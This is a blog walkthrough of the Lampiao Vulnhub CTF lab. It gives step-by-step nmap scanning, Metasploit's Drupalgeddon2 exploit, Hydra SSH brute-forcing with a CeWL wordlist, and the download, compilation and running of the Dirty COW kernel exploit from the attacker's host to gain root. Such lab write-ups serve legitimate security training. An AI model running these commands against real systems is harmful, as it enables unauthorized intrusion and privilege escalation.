Lampiao Vulnhub/Proving grounds CTF Lab walkthrough

-

 Welcome to my blog! 😊

Hello, friend’s ,My name is Aj I am a cybersecurity analyst.

Today, we are working on solving the Lampiao Vulnhub/Proving Grounds CTF Lab. This blog post provides a detailed walkthrough of the Lampiao Vulnhub/Proving grounds CTF lab, a popular cybersecurity training platform. The lab is designed to test and improve penetration testing skills, and this post offers valuable insights for beginners and advanced users alike. The author explains the vulnerabilities and exploits used to gain access to the system, providing helpful screenshots and code snippets throughout. This post is an excellent resource for cybersecurity professionals, ethical hackers, and anyone interested in learning more about penetration testing. Keywords: Vulnhub, Proving grounds, CTF lab, walkthrough, cybersecurity, penetration testing, ethical hacking.


Lampiao

Lampiao is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing. This is a virtual environment designed to provide a hands-on experience for individuals interested in learning about cybersecurity and practicing their penetration testing and vulnerability assessment skills. The lab features a range of intentionally vulnerable virtual machines that simulate real-world cybersecurity scenarios and challenges. Participants are required to identify and exploit vulnerabilities in the virtual machines to obtain flags or keys.


In this blog post, we will explore new techniques and methodologies for penetration testing. Our discussion will cover the following topics:

  1. Information gathering through port scanning and directory brute-forcing.
  2. Searching for exploits using msfconsole.
  3. How to use  msfconsole exploits.
  4. Creating custom wordlists based on the target website.
  5. Conducting SSH password brute-forcing using Hydra.
  6. Privilege escalation using the Dirty COW technique.

Step 1 :- Scanning 


Firstly, we will initiate the process of information gathering by utilizing nmap.

Nmap will allow us to identify open ports, as well as the services that are currently running on those ports, along with their corresponding service versions. A web service is running on port 80 .


Nmap command’s

$ sudo nmap -sV -sC -v -T5 target-ip -oN filename -Pn

sudo :-  Nmap is running with superuser permissions 
-sV :-  Version detection 
-sC :-   Run default scripts
-v   :-   Increases the verbosity of the nmap output.
-Pn :-   No ping (ICMP packets blocked)
-T5 :-  Sets the timing template to “insane”, (for first scanning )
-oN :- save the scan results in a specific file format

target-ip = Your target ip like 192.168.206.48
filename = Results file name
  



As a web service is running on port 80, I performed a directory brute force using 'dirb' and gathered information accordingly .




I did not find any vulnerabilities on ports 80 and 22, even after trying for 37 minutes with tools like dirb,nmap,Metasploit,exploit,db etc. Then, I run an all port scan and found another web service running
on port 1898.

$ sudo nmap -sV -v -p- -T5 target-ip  -Pn
-p- for all ports



Step 2 :- Enumeration

I see across a login page on port 1898 and ran a vulnerability scan with the '--script=vuln' option on the same port

The "vuln" script is a collection of NSE (Nmap Scripting Engine) scripts that are designed to detect various types of vulnerabilities in network services. Some of the vulnerabilities that the script can detect include outdated software versions, misconfigurations, and known security weaknesses

After running the vulnerability scan, I found that the target system was running Drupal 7. Now, I will check whether this version of Drupal is vulnerable or not


$sudo nmap -sV -p 1898 --script=vuln -v -Pn -T5 target-ip



I found an exploit named 'drupal_drupalgeddon2' in msfconsole for Drupal.

The Drupalgeddon2 vulnerability (CVE-2018-7600) is a highly critical security flaw that existed in the Drupal content management system (CMS) versions 7.x and 8.x prior to version 7.58, 8.3.9, 8.4.6, and 8.5.1.

The vulnerability allowed an attacker to remotely execute arbitrary code on a vulnerable Drupal website. Specifically, the vulnerability was related to a lack of input sanitization in the Drupal core's handling of some fields, which allowed attackers to exploit the flaw by sending specially crafted requests to a vulnerable website.

$ msfconsole -q  (start msfconsole in "quiet mode")

search drupa 7 


Step 3 :- Gaining System Access


use 1 (for selecting exploits 1.)  
info (for exploit information)



set rhosts target-ip

set rport target-port

show options (for see more options)

set lhost lisner host (its your ip )

run


I have obtained a Meterpreter session. use shell command for shell access

shell

id ( for  user ID (UID), group ID (GID),)

pwd (present working directory)

ls -al (ls for listing of the directory and files , -a for hidden file and l for long results)



We have found the user named Tiago and the location of his directory in the /home directory. In /tiago directory, we found our flag in local.txt.

ls 
/home (list home directory contents)
cd /home/tiago (go to tiago directory)
ls 
cat local.txt (use for see local flags)


The shell obtained through MSFconsole has low privileges, so we cannot perform privilege escalation for any other user. So , We need to obtain Tiago's shell using various methods. Let's begin.

Step 4 :- Privilege escalation


I tried various methods for  obtain Tiago's shell  & privilege escalation, but none of them worked. Then I created a wordlist using the website's contents, for which I used the cewl tool.


$ cewl  http://target,website  -w /home/kali/Desktop/lampiao/wordlis.txt

cewl :- CEWL stands for Custom Word List Generator. It is a command-line tool used for generating custom wordlists from a given input such as a website or a document. CEWL is especially useful for performing password attacks, as it allows an attacker to generate a list of potential passwords based on the target's interests, keywords, or specific terminology used in the content of the website.

-w :- The cewl -w command is used to generate a custom wordlist using CEWL and save it to a file.       The  -w option specifies the output file name.
 http://target,website  = target website 
/home/kali/Desktop/lampiao/wordlis.txt  = save file path with name

To view the contents of the wordlist, use cat.

$ cat wordlis.txt

 
We have generated a custom wordlist using CEWL and saved it as wordlis.txt. Now we will use this wordlist to brute force the virus login field. I first tried on the web login page, but nothing was found. Then we tried SSH brute force with the username tiago using hydra.

$hydra -l tiago -P /home/kali/Desktop/lampio/wordlis.txt target-ip ssh

hydra :- Hydra is a powerful open-source tool used for password cracking and brute-force attacks. It supports various network protocols including HTTP, FTP, SSH, Telnet, and many more. Hydra works by using a combination of usernames and passwords to attempt to gain unauthorized access to a system or service.
-l :- for username (-L for wordlist of username)
-P:- for pasword wordlist (-p for password)

ssh :-  for brute-forcing the SSH service (SSH (Secure Shell) is a cryptographic network protocol used for secure remote access to a computer or server. It provides a secure channel over an unsecured network, such as the Internet, by encrypting all data exchanged between the client and the server.)



Now that we have the SSH password, we will log in

$ ssh tiago@target-ip (After using this command it will ask for password then give the password that we have obtain using hydra)

(ssh is a linux command )



First, download 'linux-exploit-suggester.sh' on your system. After that, start a Python3 server at the same path.

 'linux-exploit-suggester.sh'  is a script that can be used to identify potential vulnerabilities in a Linux system by scanning the installed kernel version and comparing it to a database of known vulnerabilities.

wget https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-suggester/master/linux-exploit-suggester.sh
ls 
python3 -m http.server 80

wget :- for download some thing
phyton3 -m http.server (-m for module and http.server is a module)




Then, I went to the /tmp directory and downloaded the 'linux-exploit-suggester.sh' script from my server into Tiago's shell.

cd /tmp                                                                           (for go to /tmp directory)
ls                                                                                    (list contents)
wget http://your-ip/linux-exploit-suggester.sh              (download script from your server)

After downloading, we will give execute permission to 'linux-exploit-suggester.sh' using 'chmod', and then run this script using './'. 

chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

+x (for execute permission)


In the script's results, we have found the vulnerability of DirtyCow 2, and an exploit has also been suggested for it.
So let's try this exploit and see what happens.

Dirty Cow, also known as CVE-2016-5195, is a privilege escalation vulnerability in the Linux kernel that was discovered in 2016. It is caused by a race condition in the way the kernel handles copy-on-write (COW) pages, which are a common mechanism used by the kernel to efficiently share memory pages between processes.

The vulnerability allows an attacker who has limited access to a system, such as a low-privileged user account, to gain root privileges by exploiting the race condition in the COW mechanism to modify read-only memory mappings. By exploiting this vulnerability, an attacker can write to read-only memory pages that are mapped by the kernel, including the pages that contain the password hashes in the /etc/shadow file. With root privileges, the attacker can then take control of the system, install malware, steal sensitive information, or perform other malicious actions.

The vulnerability affects most Linux-based operating systems, including Android, and has the potential to affect millions of devices.


The exploit for the Dirty COW vulnerability is also available online, and it has been highlighted as a result. This exploit is available on Exploit DB.


In the same path where you downloaded linux-exploit-suggestor.sh, download 40847 and use 'wget' to upload it on Tiago's shell. Give execute permission to 40847.cpp using 'chmod' and  run g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil. 

 Brief explanation of each part of the command:
  • "g++": This is the command to invoke the GNU C++ compiler.
  • "-Wall": This option enables all warning messages.
  • "-pedantic": This option ensures strict conformance to the C++ language standard.
  • "-O2": This option enables level 2 optimization.
  • "-std=c++11": This option specifies the C++ version to use (C++11 in this case).
  • "-pthread": This option links the program with the POSIX thread library.
  • "-o dcow": This option specifies the output file name to be "dcow".
  • "40847.cpp": This is the input source code file.
  • "-lutil": This option links the program with the "util" library, which provides some useful functions.
wget http://your-ip/40847.cpp
chmod +x 40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil.  (The command  is used to compile and link the C++ source code file "40847.cpp" and create an executable file named "dcow".)

./dcow = The code creates a Dcow class that contains several variables and methods related to the exploit. The constructor reads the "/etc/passwd" file and replaces the password hash for the "root" user with a default hash value. It then creates a backup file with the original content of the "/etc/passwd" file

After running dcow, the password for your superuser has been changed.
Now the password for your superuser is 'dirtyCowFun'
su                         (use su command for "switch user" )
id                         (use id command for see user ID (UID), group ID (GID) ) 
cd /root               (go to root directory)
ls                         (ls for list contains )
cat proof.txt       (cat for open your proof.txt file)



Summary :- The blog post describes the process of performing a penetration testing on a virtual machine named Lampiao. The author starts with information gathering through port scanning and directory brute-forcing using tools like nmap and dirb. The author then performs vulnerability scanning and identifies a Drupalgeddon2 exploit in msfconsole for Drupal, which is a popular content management system. After gaining system access, the author tries to perform privilege escalation by obtaining Tiago's shell using various methods including Linux privilege escalation techniques and Metasploit. However, they fail to escalate privileges. Eventually, the author creates a custom wordlist using CEWL, which is a tool that scrapes websites for potential passwords, and uses it to perform SSH password brute-forcing using Hydra, a popular password-cracking tool. Finally, the author performs privilege escalation using the Dirty COW technique, which is a vulnerability in the Linux kernel that allows a user to gain root access.One thing I would like to mention is that while it's essential to practice your penetration testing skills, it's also important to ensure that you are conducting these activities in a legal and ethical manner. It's crucial to obtain permission from the owner of the system or the organization before attempting any penetration testing activity, as unauthorized testing could lead to legal consequences and penalties.

Moreover, it's essential to keep in mind that while practicing your skills, you must not cause any damage to the system, steal any sensitive data, or cause any disruption to the network or services. It's crucial to follow the rules of engagement and stay within the scope of the authorized testing activities to avoid any accidental damage or data breaches.

Overall, it's excellent to see that you are interested in learning about cybersecurity and practicing your penetration testing skills, which are in high demand in today's job market. Keep exploring and learning, but always ensure that you are doing it ethically and legally to avoid any negative consequences.



My name is Aj, and I'm a cybersecurity analyst. I post blogs related to penetration testing, OSCP lab, Vulnhub, and hacking on my website. If you need a blog related to any specific topic, feel free to email me at anytimehack2022@gmail.com . Thank you!



Comments

Post a Comment

Popular posts from this blog

Gaara Vulnhub/Proving grounds CTF Lab walkthrough

-
Image
Welcome to my blog! 😊 Hello, friends, My name is Ajay I am a cybersecurity analyst. Gaara: The  Gaara   lab contains multiple vulnerabilities that allow attackers to gain unauthorized access to the system and escalate privileges. The lab is designed to be challenging, and users are required to use various tools and techniques to identify and exploit the vulnerabilities. It is important to note that the use of the  Gaara   lab should only be for educational and learning purposes, and not for any malicious activities. It is recommended that users have a basic understanding of networking, Linux, and ethical hacking before attempting to use the lab. In today's lab, we will be utilizing new techniques and methodologies in penetration testing. In this lab, we will be following these steps: Information gathering using nmap. Directory brute-forcing  SSH Password Brute-forcing Using Hydra Privilege escalation by SUID Bit Set on gdb  Step 1:-  Scanning  First, we conducted a port sc
Read more

HA: Natraj Vulnhub/Proving grounds CTF Lab walkthrough

-
Image
  Welcome to my blog! 😊 Hello, friends, My name is Ajay I am a cybersecurity analyst. HA: Natraj Nataraj is a dancing avatar of Hindu God Shiva. His dance is called Tandava and it is only performed when he is most angry. Whoever interrupts his dance dies by Shiva while dancing. This is a Boot2Root challenge. Based on Nataraja. You only have to root the machine and find the root flag! All the best! The HA: Natraj lab contains multiple vulnerabilities that allow attackers to gain unauthorized access to the system and escalate privileges. The lab is designed to be challenging, and users are required to use various tools and techniques to identify and exploit the vulnerabilities. It is important to note that the use of the HA: Natraj lab should only be for educational and learning purposes, and not for any malicious activities. It is recommended that users have a basic understanding of networking, Linux, and ethical hacking before attempting to use the lab. In today's HA: Natraj lab,
Read more

EVILBOX Vulnhub/Proving grounds CTF Lab walkthrough

-
Image
  Welcome to my blog! 😊 Hello, friends, My name is Ajay I am a cybersecurity analyst. EVILBOX: The EVILBOX  lab contains multiple vulnerabilities that allow attackers to gain unauthorized access to the system and escalate privileges. The lab is designed to be challenging, and users are required to use various tools and techniques to identify and exploit the vulnerabilities. It is important to note that the use of the EVILBOX  lab should only be for educational and learning purposes, and not for any malicious activities. It is recommended that users have a basic understanding of networking, Linux, and ethical hacking before attempting to use the lab. In today's lab, we will be utilizing new techniques and methodologies in penetration testing. In this lab, we will be following these steps: Information gathering using nmap. Directory brute-forcing  . LFI (Local File Inclusion) exploitation using fuff. Obtaining the public key of a user through SSH. Extracting the passphrase fro
Read more